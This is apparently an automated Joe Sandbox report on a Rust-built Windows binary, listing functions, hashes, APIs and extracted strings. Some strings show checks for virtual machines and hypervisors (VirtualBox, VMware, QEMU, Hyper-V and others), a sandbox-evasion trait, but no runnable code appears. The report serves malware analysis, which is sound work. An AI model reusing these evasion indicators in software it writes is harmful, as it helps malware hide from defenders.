                                            • Opcode Fuzzy Hash: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                            • Instruction Fuzzy Hash: 88110D21B04B1699F710AF68E8483EC7375BB56768FC04231CE6D567A8DF28E549C350
                                            Function 00007FF7B901CC80 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ComputerName$ErrorLast
                                            • String ID:
                                            • API String ID: 2051095488-0
                                            • Opcode ID: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                            • Instruction ID: d601ad2e69a316fd1dbf1a48cbcf65ed488cae11da3c5804a0110cd2f6469f05
                                            • Opcode Fuzzy Hash: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                            • Instruction Fuzzy Hash: 8E41E522F04A22C9F710AF6A98413FDA771BF66758F848134EF6D16A89EF38D441C360
                                            Function 00007FF7B9036A40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B90340C9), ref: 00007FF7B9036AC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                            • Instruction ID: bd10e328d9797f3f45d12bcbdcc5a2875f679fa4535954093758da625204fbb3
                                            • Opcode Fuzzy Hash: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                            • Instruction Fuzzy Hash: 49219233B19A1298EB119FA5E9411ADB374BB257A8F944531DF6D13B8CDF38D492C310
                                            Function 00007FF7B9036C2E Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Process$CloseCurrentHandlePrng
                                            • String ID:
                                            • API String ID: 842889843-0
                                            • Opcode ID: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                            • Instruction ID: 05458e0c1d74b8714474569a20d03e418cd22198a5a962eaa9687514ffe5d7ca
                                            • Opcode Fuzzy Hash: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                            • Instruction Fuzzy Hash: DDF03C32A08A4291EA116F29D6403A9A2A2E755BE4F948031CB2D47798DE3CE4C18310

                                            Non-executed Functions

                                            Function 00007FF7B903AA60 Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 333libraryloadersynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                            • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                            • API String ID: 422451348-310313858
                                            • Opcode ID: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                            • Instruction ID: 94edbf292a7827fd94a11487afd9c4de0334a8da80ea835e132d4f54a8b545da
                                            • Opcode Fuzzy Hash: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                            • Instruction Fuzzy Hash: 3BE1BF21B08A5395FB10AF69A9443B9B3B0BF6AB58F854534DE2D47798EF3CE0449320
                                            Function 00007FF7B9049174 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                            • Instruction ID: 1ff17db140bcdd8ccbd95315aee026c6c0d0041d7548ded47e7854f96e28a8fa
                                            • Opcode Fuzzy Hash: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                            • Instruction Fuzzy Hash: A5318172609B829AEB609F64E8843EDB374FB96744F84403ADB5D47B99DF38C548C720
                                            Function 00007FF7B902F330 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 220windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs, xrefs: 00007FF7B902F66C
                                            • NTDLL.DLL, xrefs: 00007FF7B902F385
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorFormatHandleLastMessageModule
                                            • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs
                                            • API String ID: 1273946083-2010291737
                                            • Opcode ID: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                            • Instruction ID: bb02c2ceb349475ece88d6dfaed5df7df74ef32b00793d0ae3afd0c6dd073ae8
                                            • Opcode Fuzzy Hash: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                            • Instruction Fuzzy Hash: 4CA1A172A09BC394E731AF28D8047F8B6B4FB26794FA04135CB6D46B98DF78D6859310
                                            Function 00007FF7B9037520 Relevance: 7.8, APIs: 5, Instructions: 271threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AttributeInitializeListProcThread
                                            • String ID:
                                            • API String ID: 1263136677-0
                                            • Opcode ID: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                            • Instruction ID: 9b777c5aa676827d6de26b6a203bae5101834867890b5f5a4b849d4485a24b99
                                            • Opcode Fuzzy Hash: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                            • Instruction Fuzzy Hash: 85A1B662B1C65780FA15AF1A99147B9A3B1BF5ABA4F948631DF7D037A8DE3CD041C320
                                            Function 00007FF7B9041140 Relevance: 4.6, Strings: 3, Instructions: 821COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                            • API String ID: 0-1033176386
                                            • Opcode ID: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                            • Instruction ID: 5a3a9b7f81ca4ddcfc9d3ef82c3648f89bb1ca17c1bd6ec00b9a1fbadba650b5
                                            • Opcode Fuzzy Hash: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                            • Instruction Fuzzy Hash: 6D620562E1C69345E795AE1894062BDABB2AB37794FC48231DF7E077C8DB38D944D320
                                            Function 00007FF7B904EF00 Relevance: 4.1, Strings: 3, Instructions: 306COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Authenti$GenuineI$HygonGen
                                            • API String ID: 0-696657513
                                            • Opcode ID: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                            • Instruction ID: cafeb958e316903437a5d4e19eb134d4edc63109b407c3db753d6a50806b3617
                                            • Opcode Fuzzy Hash: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                            • Instruction Fuzzy Hash: 7B917FA7B2595102FB5C8995BD32BB94C92B3687C8F58A03DEE6F97BC4DD7CC9118200
                                            Function 00007FF7B903D000 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: punycode{-}0
                                            • API String ID: 0-2450133883
                                            • Opcode ID: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                            • Instruction ID: 3cec79a3bdbb06e3d7dd483340a2dae554b6b26793042fc0c34354597b0a49f1
                                            • Opcode Fuzzy Hash: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                            • Instruction Fuzzy Hash: 0DE11A62F1C69646FB609F2995047F9A6A5BB6E7D8F804231CF2D07BC8DE3CE5458320
                                            Function 00007FF7B9046CA0 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 00000000
                                            • API String ID: 0-3221785859
                                            • Opcode ID: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                            • Instruction ID: ea419475e54f1acfcc338e99d8edc2b72dd55d3a960ee9be2c3d21f5a9dea5b7
                                            • Opcode Fuzzy Hash: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                            • Instruction Fuzzy Hash: D2D15F61F0965385FB25DE2DE4007B5A6B1AB72384F848632DF6D07BACEF38D9428310
                                            Function 00007FF7B902AB10 Relevance: 1.5, APIs: 1, Instructions: 11timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,?,?,?,00007FF7B901D6E0,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7B902AB26
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Time$FilePreciseSystem
                                            • String ID:
                                            • API String ID: 1802150274-0
                                            • Opcode ID: 27e9e6135f1f82144b39caf04fe9cc793f8d8504bb6f5267b953b58c82e1fef5
                                            • Instruction ID: eeea0269764fc71929181aa9296b934f156f2840c8b2583aa27bc2c978aff267
                                            • Opcode Fuzzy Hash: 27e9e6135f1f82144b39caf04fe9cc793f8d8504bb6f5267b953b58c82e1fef5
                                            • Instruction Fuzzy Hash: 6BD0923AB60A41EEE301DB74D4847AC7738A755308F940090DE5D52A58CB34D696CA64
                                            Function 00007FF7B902BB60 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789abcdef
                                            • API String ID: 0-1757737011
                                            • Opcode ID: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                            • Instruction ID: b31c958b4ea8ec92a525689490ed4460001e43fe701e412f5bca9a0352288526
                                            • Opcode Fuzzy Hash: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                            • Instruction Fuzzy Hash: 21612452E185A259F715AF3845202FDBFB1AB27344F844539DFBA2B6E9CA3CD502D320
                                            Function 00007FF7B9043930 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789abcdefBorrowMutErroralready borrowed:
                                            • API String ID: 0-1320686809
                                            • Opcode ID: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                            • Instruction ID: 9737565c4cea66c194d35b44863376199fc3b424e6d80ba758341311c1f6c0c5
                                            • Opcode Fuzzy Hash: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                            • Instruction Fuzzy Hash: 6E510F63F196E2AAE3219F7C9400A9C7F719F32B44F4490A4CF981BF9AC61AC115E761
                                            Function 00007FF7B90384D0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B903866E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            • API String ID: 0-2313043791
                                            • Opcode ID: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                            • Instruction ID: 0a864dcc3aa7b238693b62870ae1e74b0cf55354f61ffad48e2c30fdc50fd4eb
                                            • Opcode Fuzzy Hash: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                            • Instruction Fuzzy Hash: A05187A2F1861244FB15AF59D9042B8E2B5BB297A4F848535DF6C436D8DF7CE5C1C220
                                            Function 00007FF7B90242E0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B90242EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            • API String ID: 0-2313043791
                                            • Opcode ID: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                            • Instruction ID: b4145161c71716922809aa9bde53d13f6662b45f26245d712a44acbff0df6ccb
                                            • Opcode Fuzzy Hash: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                            • Instruction Fuzzy Hash: D3313763A18AE245D7688E15E8046BAB778FB15790F905235DFBE023D0FBBCD590E310
                                            Function 00007FF7B9011000 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B9011018
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            • API String ID: 0-2313043791
                                            • Opcode ID: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                            • Instruction ID: 8e25aa9f76eb02e30ebe27135b381145169e5af867016d2b85523e2deff329e1
                                            • Opcode Fuzzy Hash: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                            • Instruction Fuzzy Hash: CF21D322F15A6288FF50AE69D4407ED6771BB15BE8F448035EF2D17B8DEE29D0418310
                                            Function 00007FF7B902E030 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                            • Instruction ID: 4ad887e13cd75abb2314aa21652a61126330179ddfe1499888d7f0f098099823
                                            • Opcode Fuzzy Hash: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                            • Instruction Fuzzy Hash: 67F0BB12B4AD4386F6556F4E6944174D2B46FAAF90F8C4034DF1C52398DE3CE9C29620
                                            Function 00007FF7B901FCF0 Relevance: .6, Instructions: 628COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
                                            • Instruction ID: 0d2044f3b0bf5d7e2fc1abbab9074e4bfc6a7aa31143c5b72da66105081da7a1
                                            • Opcode Fuzzy Hash: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
